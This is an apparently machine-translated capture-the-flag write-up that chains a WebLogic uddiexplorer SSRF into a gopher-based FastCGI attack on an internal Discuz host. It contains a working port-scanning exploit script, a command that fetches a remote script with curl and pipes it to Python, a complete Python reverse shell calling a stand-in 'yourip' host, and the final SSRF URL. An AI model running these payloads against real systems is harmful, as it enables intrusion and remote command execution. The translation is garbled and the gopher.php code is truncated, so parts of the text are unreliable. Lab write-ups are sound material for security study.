Three white hats-search for you from the stars-Phase 1

Three white hats-looking for you from the stars-Phase I, three white hats-looking for you from the stars-Phase I challenge introduction

I lost you from the stars. I may need to use everything I have to use to retrieve you. After two sentences are compiled, I can't make it. okay, I admit that this is the first issue of penetration.

Challenges

Http://0761e975dda0c67cb.jie.sangebaimao.com/

0x01 information collection

The opening address is a dz argument. It seems that it is not so fun, or the latest version.

Since it is completely transparent, I feel like I am offering a big poster, "Let's look at it "!(The dictionary is related)

Soon get the related information (excluding the original contents and faces of dz)

/info.php/uddiexplorer/

One is phpinfo () information, which is useful.

/opt/discuz/info.php

The other is weblogic.

Result: Baidu"Uddiexplorer vulnerability"You can now knowWeblogic uddiexplorerExistSSRFVulnerability.

This transparent relationship lies inSSRF!!!

Exploit vulnerabilities

SSRF is not only engaged in the internal network, but also combined with the docker of three white hats. 127.0.0.1 is King!

Baidu"SearchPublicRegistries ssrf vulnerability exp"

Get http://www.tuicool.com/articles/UjaqIbz

Get a notebook and modify it for use !!!

Port overview. py

#!/usr/bin/env python  # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str):    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'    ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',)    for port in ports:        exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port)        try:            response = requests.get(exp_url, timeout=15, verify=False)            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)            re_sult2 = re.findall('but could not connect',response.content)            if len(re_sult1)!=0 and len(re_sult2)==0:                print ip_str+':'+port        except Exception, e:            passif __name__ == "__main__":    scan('127.0.0.1')

Ports 9000, 80, 3306, 7001, and are successfully cracked.

SSRF + GOPHER has always been awesome, and it has recently become increasingly popular.

Baidu ~~

Rr chicory's latest article Do edevil Things with gopher: //

0x03 attack FastCGI

Generally, FastCGI is bound to Port 127.0.0.1, but the use of Gopher + SSRF can perfectly attack FastCGI to execute arbitrary commands.

0x06 references

Remote Exploitation of PHP FastCGI

Command line

Fcgi_exp

Transportation

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php

Save payloadto x.txt

The anti-bot shell black technology and bash anti-bot are ineffective ~~

Then urlencode uses payload to generate ssrf. php

Shell. py

import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("yourip",9999))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  p=subprocess.call(["/bin/bash","-i"]);

Gopher. php

 ");?>

The ssrf. php file is successfully generated.

Reverse shell

VPS operation

nc -lvv 9999

Use SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php

Anti-renewal successful ~~~

GETFLAG

Find it by yourself